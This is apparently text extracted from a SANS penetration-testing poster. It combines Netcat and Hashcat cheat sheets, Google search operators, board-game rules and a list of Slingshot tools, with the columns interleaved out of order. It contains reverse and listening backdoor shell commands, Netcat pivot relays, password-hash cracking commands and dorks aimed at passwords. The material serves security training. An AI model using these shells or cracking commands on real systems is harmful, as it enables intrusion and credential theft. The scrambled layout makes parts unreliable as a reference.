Read SANS Pen Test Blogs: https://pen-testing.sans.org/blog
Take SANS Pen Test Training: www.sans.org/pentest
Attend an InfoSec Conference: https://infosec-conferences.com/

Download a PDF version of the Pivots & Payloads poster, additional game pieces, and game modifiers at www.sans.org/boardgame
Fundamentals

FUNDAMENTAL NETCAT CLIENT:
$ nc [TargetIPaddr] [port]

Contributor: ED SKOUDIS @edskoudis


HASHCAT

Basic Syntax
hashcat [options]... hash|hashfile|hccapxfile [dictionary|mask|directory]...


FUNDAMENTAL NETCAT LISTENER:
$ nc -l -p [LocalPort]

Create a Netcat listener on arbitrary local port [LocalPort]

Attack Modes
# | Mode | Description
0 | Straight | Dictionary attack
1 | Combination | Uses 2 wordlists; each word in list 2 is appended to each word in list 1
3 | Brute-force | Use masks, Markov, or pure brute force
6 | Hybrid Wordlist + Mask | Like Combination, but uses a wordlist and brute force
7 | Hybrid Mask + Wordlist | Like Combination, but uses brute force and a wordlist

Searching for Options
Unix: hashcat --help | grep -i [string]
Windows: hashcat --help | find /i "[string]"


PEN TEST & VULNERABILITY ASSESSMENT TRAINING

SEC504: Hacker Tools, Techniques, Exploits, and Incident Handling (GIAC: GCIH)


Both the client and listener take input from STDIN and send 
data received from the network to STDOUT 


Connect to an arbitrary port [port] at IP Address [TargetIPaddr] 


SEC560: Network Penetration Testing and Ethical Hacking (GIAC: GPEN)

SEC460: Enterprise Threat and Vulnerability Assessment

Backdoor Shells


LISTENING BACKDOOR SHELL ON LINUX:
$ nc -l -p [LocalPort] -e /bin/bash


Netcat Command Flags 
$ nc [options] [TargetIPaddr] [port(s)] 


The [TargetIPaddr] is simply the other side’s IP address or 
domain name. It is required in client mode, of course (because 
we have to tell the client where to connect), and it is optional 
in listen mode. 


LISTENING BACKDOOR SHELL ON WINDOWS:
C:\> nc -l -p [LocalPort] -e cmd.exe


Create a shell on local port [LocalPort] that can then be accessed using a fundamental Netcat client

-l    Listen mode (default is client mode)

Common Hash Modes

RAW HASHES
#     Name
0     MD5
100   SHA1
1400  SHA-256
1700  SHA-512

ARCHIVES
#     Name
11600 7-Zip
13600 WinZip
12500 RAR3-hp
13000 RAR5
14800 iTunes backup >= 10.0

NETWORK PROTOCOLS
#     Name
5500  NetNTLMv1 / NetNTLMv1+ESS
5600  NetNTLMv2
7500  Kerberos 5 AS-REQ Pre-Auth etype 23
2500  WPA/WPA2
2501  WPA/WPA2 PMK
5300  IKE-PSK MD5
5400  IKE-PSK SHA1

WEB PLATFORMS
#     Name
400   WordPress, Joomla >= 2.5.18 (MD5)
7900  Drupal7
124   Django (SHA-1)
10000 Django (PBKDF2-SHA256)
3711  MediaWiki B type

OPERATING SYSTEMS
#     Name
1000  NTLM
3000  LM
1100  Domain Cached Credentials (DCC), MS Cache
2100  Domain Cached Credentials 2 (DCC2), MS Cache 2
12800 MS-AzureSync PBKDF2-HMAC-SHA256
5700  Cisco-IOS type 4 (SHA256)
9200  Cisco-IOS (PBKDF2-SHA256)
9300  Cisco-IOS (scrypt)
1500  descrypt, DES (Unix), Traditional DES
7400  sha256crypt, SHA256 (Unix)
1800  sha512crypt, SHA512 (Unix)

DATABASES
#     Name
11200 MySQL CRAM (SHA1)
200   MySQL323
300   MySQL4.1/MySQL5
112   Oracle S: Type (Oracle 11+)
12300 Oracle T: Type (Oracle 12+)
1731  MSSQL (2012, 2014)
11100 PostgreSQL CRAM (MD5)

DOCUMENTS
#     Name
9400  MS Office 2007
9500  MS Office 2010
9600  MS Office 2013
10600 PDF 1.7 Level 3 (Acrobat 9)
10700 PDF 1.7 Level 8 (Acrobat 10 - 11)


-L    Listen harder (supported only on the Windows version of Netcat). This option makes Netcat a persistent listener that starts listening again after a client disconnects

REVERSE BACKDOOR SHELL ON LINUX:
$ nc [YourIPaddr] [port] -e /bin/bash


SEC560: www.sans.org/sec560 | SEC504: www.sans.org/sec504

SEC642: Advanced Web App Pen Testing, Ethical Hacking, and Exploitation Techniques

SEC460: www.sans.org/sec460

SEC573: Automating Information Security with Python (GIAC: GPYC)


-u    UDP mode (default is TCP)

-p    Local port (In listen mode, this is the port listened on; in client mode, this is the source port for all packets sent)

REVERSE BACKDOOR SHELL ON WINDOWS:
C:\> nc [YourIPaddr] [port] -e cmd.exe

Create a reverse shell that will attempt to connect to [YourIPaddr] on local port [port]. This shell can then be captured using a fundamental nc listener


SEC542: Web App Penetration Testing and Ethical Hacking (GIAC: GWAPT)


-e    Program to execute after connection occurs, connecting STDIN and STDOUT to the program

-n    Don't perform DNS lookups on names of machines on the other side

-z    Zero-I/O mode (Don't send any data, just emit a packet without payload)

-w [N]    Timeout for connects, waits for N seconds after closure of STDIN. A Netcat client or listener with this option will wait for N seconds to make a connection. If the connection doesn't happen in that time, Netcat stops running.

TCP Port Scanner

PORT SCAN AN IP ADDRESS:
$ nc -v -n -z -w1 [TargetIPaddr] [start_port]-[end_port]

Attempt to connect to each port in a range from [end_port] to [start_port] on IP Address [TargetIPaddr] running verbosely (-v on Linux, -w on Windows), not resolving names (-n), without sending any data (-z), and waiting no more than 1 second for a connection to occur (-w1)


Search Engine Operators
intitle:

SEC542: www.sans.org/sec542

SEC567: Social Engineering for Penetration Testers

SEC642: www.sans.org/sec642

SEC617: Wireless Penetration Testing and Ethical Hacking (GIAC: GAWN)

SEC573: www.sans.org/sec573

SEC575: Mobile Device Security and Ethical Hacking (GIAC: GMOB)


-v    Be verbose, printing out messages on Standard Error, such as when a connection occurs

-vv   Be very verbose, printing even more details on Standard Error

The randomize ports (-r) switch can be used to choose port numbers randomly in the range

intitle:"Index Of"

Info Commands
hashcat -I | Show info about OpenCL devices
hashcat -b | Benchmark all hashes
hashcat -b -m [#] | Benchmark a specific hash mode
hashcat -V | Show version info
hashcat [hashfile] --show | Show cracked hashes
hashcat [hashfile] --left | Show uncracked hashes


Generate Wordlists for Other Tools with --stdout
hashcat -a 3 --stdout Password?d | Creates list: Password0-Password9
hashcat -a 6 --stdout wordlist.dic ?d | Append digits to the end of words
hashcat -a 7 --stdout ?d wordlist.dic | Prepend digits to the beginning of words


site:

Netcat Relays on Windows
To start, enter a temporary directory where we will create .bat files:
C:\> cd c:\temp

Netcat Relays on Linux
To start, create a FIFO (named pipe) called backpipe:
$ cd /tmp
$ mknod backpipe p


intitle:"admin"

site:sans.org
site:www.sans.org


Performance Tweaks
-O       (Capital 'O') Optimized kernel; passwords must be < 32 characters
-w [#]   Workload profile: 1 Low, 2 Default, 3 High, 4 Nightmare

Built-in Character Sets
Character sets are combined to create "masks" or patterns for brute force attacks.


LISTENER-TO-CLIENT RELAY (Windows):
C:\> echo nc [TargetIPaddr] [port] > relay.bat
C:\> nc -l -p [LocalPort] -e relay.bat

LISTENER-TO-CLIENT RELAY (Linux):
$ nc -l -p [LocalPort] 0<backpipe | nc [TargetIPaddr] [port] | tee backpipe


site:sans.org -site:www.sans.org 


hashcat -w 3 -O -a 0 -m [#] [hashfile] [wordlist]

Create a relay that sends packets from the local port [LocalPort] to a Netcat client connected to [TargetIPaddr] on port [port]


SEC567: www.sans.org/sec567 | SEC617: www.sans.org/sec617

SEC760: Advanced Exploit Development for Penetration Testers

SEC575: www.sans.org/sec575

SEC660: Advanced Penetration Testing, Exploit Writing, and Ethical Hacking (GIAC: GXPN)


inurl:admin

site:target.tgt "at least" "characters long" password


LISTENER-TO-LISTENER RELAY (Windows):
C:\> echo nc -l -p [LocalPort_2] > relay.bat
C:\> nc -l -p [LocalPort_1] -e relay.bat

LISTENER-TO-LISTENER RELAY (Linux):
$ nc -l -p [LocalPort_1] 0<backpipe | nc -l -p [LocalPort_2] | tee backpipe

Examples
Straight
hashcat -a 0 -m [#] [hashfile] [wordlist]
hashcat -a 0 -m [#] [hashfile] [wordlist] -r [rulefile]
Combination
hashcat -a 1 -m [#] [hashfile] [wordlist-1] [wordlist-2]
hashcat -a 1 -m [#] [hashfile] [wordlist-2] [wordlist-1] -r [rulefile]
Brute-force
hashcat -a 3 -m [#] [hashfile]
hashcat -a 3 -m [#] [hashfile] [mask]
Hybrid Wordlist + Mask
hashcat -a 6 -m [#] [hashfile] [wordlist] [mask]
Hybrid Mask + Wordlist
hashcat -a 7 -m [#] [hashfile] [mask] [wordlist]

Mask Characters
?l  abcdefghijklmnopqrstuvwxyz
?u  ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d  0123456789
?h  0123456789abcdef
?H  0123456789ABCDEF
?s   !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~  (starts with a space)
?a  ?l?u?d?s
?b  0x00 - 0xff


Create a relay that sends packets from any connection on [LocalPort_1] to any connection on [LocalPort_2]

site:target.tgt "employee directory"

filetype:

CLIENT-TO-CLIENT RELAY (Windows):
C:\> echo nc [NextHopIPaddr] [port2] > relay.bat
C:\> nc [PreviousHopIPaddr] [port] -e relay.bat

CLIENT-TO-CLIENT RELAY (Linux):
$ nc [PreviousHopIPaddr] [port] 0<backpipe | nc [NextHopIPaddr] [port2] | tee backpipe


filetype:xlsx

Create a relay that sends packets from the connection to [PreviousHopIPaddr] on port [port] to a Netcat client connected to [NextHopIPaddr] on port [port2]

"@target.tgt" "Password1"
HOW TO PLAY

FOR 2 TO 6 PLAYERS / AGES 10+

GAME ELEMENTS
Game Board
Game Pieces*
Game Modifiers
(1) D6 Dice [not included]

OBJECTIVE
Be the first pen tester to reach "Achievement Unlocked" and complete the simulated pen test.

THE FIRST TIME YOU PLAY
Use scissors to remove the game pieces and game modifiers section from the poster. Cut each game piece and game modifier out to use during the game. You can download a PDF of game pieces and game modifiers at www.sans.org/boardgame

Before game play, shuffle the game modifiers and hand one face down to each player. Players should not reveal their modifier until it is used during the game.

GAME PLAY
1. Roll a single die. The player with the highest roll goes first.
2. When it's your turn, roll a single die and move your game piece the number of spaces rolled.
3. Note: Two or more game pieces may be on the same space at the same time.
4. Follow directions on the square. You may be instructed to lose a turn or move back spaces.

PIVOTS & PAYLOADS BOARD GAME POSTER: SIMULATE A FULL-SCALE HIGH-VALUE PENETRATION TEST

SLINGSHOT
SANS created the Slingshot Linux Distro for penetration testers to use in their work and in a variety of SANS pen test courses. All of the tools are open-source, updated regularly, and tested for quality, cohesiveness, and stability.
Download the latest build today at www.sans.org/slingshot
RULES OF ENGAGEMENT
You and your fellow players are encouraged to create your own rules of engagement for this game. Those rules must be agreed upon by all players prior to the beginning of the game.

GAME MODIFIERS
1. At the beginning of the game, all players are handed one modifier, face down.
2. Players can use their game modifier at any time during the game. The modifier will then be "used" and will not be allowed in game play for the duration of the game.
3. You may create your own game modifiers to use in this game.

* Game pieces are used to represent your avatar in the game, but you can create or use any game piece you like.

PIVOTS & PAYLOADS: SIMULATE A FULL-SCALE HIGH-VALUE PENETRATION TEST

Tools included in Slingshot:
Armitage - Graphical interface for Metasploit
Nmap - Network mapper and vulnerability scanner
Bro - Network analysis framework
Browser Exploitation Framework (BeEF) - Penetration testing tool that focuses on web browser exploitation
OWASP Zed Attack Proxy (ZAP) - Web application vulnerability scanner
Recon-ng - A full-featured web reconnaissance framework written in Python
BurpSuite - Web vulnerability scanner
Empire (name reconstructed from garbled poster text) - Post-exploitation framework that includes a pure PowerShell 2.0 Windows agent and a pure Python 2.6/2.7 Linux/OS X agent
Responder - A LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP
Slingshot tools (continued):
ExifTool (name reconstructed from garbled poster text) - Read and write meta information in multimedia files
Scapy - Python packet crafting library
Hashcat - Very fast password recovery tool
Social-Engineer Toolkit (setoolkit) - An open-source penetration testing framework designed for social engineering
Hydra - Tool to brute force crack a remote authentication service
SQLMap - Automatic SQL injection and database takeover tool
John The Ripper - Password recovery tool
Lair - Collaborative penetration testing reporting and aggregation across disparate sources
Tcpdump - Command line packet capture tool
Veil Evasion - Tool to generate payload executables that bypass common antivirus solutions
Metasploit - Penetration testing framework for exploitation and post-exploitation
Wireshark - Graphical packet capture tool
Nessus - Vulnerability scanner
Netcat - TCP/IP Swiss army knife

PENETRATION TESTING & VULNERABILITY ASSESSMENT TRAINING
SEC460: Enterprise Threat and Vulnerability Assessment - www.sans.org/sec460
SEC504: Hacker Tools, Techniques, Exploits, and Incident Handling (GIAC: GCIH - Certified Incident Handler) - www.sans.org/sec504
SEC542: Web App Penetration Testing and Ethical Hacking (GIAC: GWAPT - Web Application Penetration Tester) - www.sans.org/sec542
SEC560: Network Penetration Testing and Ethical Hacking (GIAC: GPEN - Penetration Tester) - www.sans.org/sec560
SEC562: CyberCity Hands-on Kinetic Cyber Range Exercise (private training only) - www.sans.org/sec562
SEC564: Red Team Operations and Threat Emulation - www.sans.org/sec564
SEC567: Social Engineering for Penetration Testers - www.sans.org/sec567
SEC573: Automating Information Security with Python (GIAC: GPYC - Python Coder) - www.sans.org/sec573
SEC575: Mobile Device Security and Ethical Hacking (GIAC: GMOB - Mobile Device Security Analyst) - www.sans.org/sec575
SEC580: Metasploit Kung Fu for Enterprise Pen Testing - www.sans.org/sec580
SEC617: Wireless Penetration Testing and Ethical Hacking (GIAC: GAWN - Assessing and Auditing Wireless Networks) - www.sans.org/sec617
SEC642: Advanced Web App Penetration Testing, Ethical Hacking, and Exploitation Techniques - www.sans.org/sec642
SEC660: Advanced Penetration Testing, Exploit Writing, and Ethical Hacking (GIAC: GXPN) - www.sans.org/sec660
SEC760: Advanced Exploit Development for Penetration Testers - www.sans.org/sec760

Download PDF version: www.sans.org/boardgame
AGES 10+ | PLAYERS 2-6

Past challenges are available 24/7/365. Develop hands-on skills in our fun and festive annual holiday-themed hacking challenge from the makers of SANS NetWars and training courses and labs.
www.holidayhackchallenge.com

PEN-PR-BGP_v1_1018
Created by SANS Penetration Testing Curriculum Staff and Faculty
©2018 SANS Institute. All Rights Reserved.